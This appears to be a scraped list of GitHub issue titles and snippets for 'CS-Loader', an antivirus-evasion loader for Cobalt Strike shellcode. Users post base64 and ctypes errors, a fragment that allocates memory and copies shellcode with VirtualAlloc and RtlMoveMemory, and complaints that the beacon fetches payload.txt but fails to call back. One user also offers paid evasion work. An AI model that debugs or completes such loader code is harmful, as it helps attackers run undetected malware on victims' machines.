CS-Loader
CS-Loader copied to clipboard
CS免杀
能联系一下吗 做项目 就是免杀而已
运行exe报错信息如下: Traceback (most recent call last): File "base64.py", line 37, in _bytes_from_decode_data UnicodeEncodeError: 'ascii' codec can't encode character '\x85' in position 4: ordinal not in range(128) During handling of the...
生成的时候需要在shellcode字符串上前加个b"--shellcode--" 执行的时候报错: `code = bytearray(base64.b64decode(code))`--line:47 ValueError: string argument should contain only ASCII characters
 引发了异常: 读取访问权限冲突。 **buf** 是 0x9D7000。
在本地调试时,64位下,GET payload.txt有时候会获取不到txt的内容。
 按照作者步骤配合好环境,运行exe时报错,能否解答一下?
''' 修复ctypes问题 ''' windll.kernel32.VirtualAlloc.restype = c_void_p windll.kernel32.RtlCopyMemory.argtypes = (c_void_p, c_void_p, c_size_t) VirtualAlloc = windll.kernel32.VirtualAlloc VirtualProtect = windll.kernel32.VirtualProtect useless += random.choice(useless) whnd = windll.kernel32.GetConsoleWindow() RtlMoveMemory = windll.kernel32.RtlMoveMemory memHscode = VirtualAlloc(c_int(0), c_int(len(code)),...
TypeError: a bytes-like object is required, not 'str'
c版cs无法上线
在服务器上可以看到有get payload.txt的请求,但无法上线  evil.cpp关键配置:  generator关键配置:    都是在win10 debug模式下编译